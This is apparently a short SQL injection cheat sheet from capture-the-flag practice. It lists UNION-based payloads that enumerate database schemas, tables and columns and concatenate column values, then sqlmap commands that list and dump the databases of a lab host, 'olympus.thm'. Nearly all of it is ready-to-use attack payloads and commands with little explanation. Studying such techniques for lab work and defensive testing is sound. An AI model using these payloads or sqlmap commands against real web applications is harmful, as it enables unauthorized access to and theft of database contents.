' or 1=1 union SELECT distinct table_schema, table_schema FROM INFORMATION_SCHEMA.tables -- "
Table Names:
' or 1=1 union select table_schema, table_name from information_schema.tables where table_schema = "<Database Name>" -- "
Column Information:
' or 1=1 union select column_name, data_type from information_schema.columns where table_name = "<Table Name>" -- "
Retrieve multiple columns:
' or 1=1 union select concat(<Column1>, 0x0a, <Column2>, 0x0a, <Column3>) from <Table Name> -- "
SQLMap
Post Request:
sqlmap -u <URL> -dump-all -data <postparam>=
# Get a list of Databases
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --dbs
# Get a list of tables on in the database
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --tables -D olympus
# Dump the found database
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --dump -D olympus
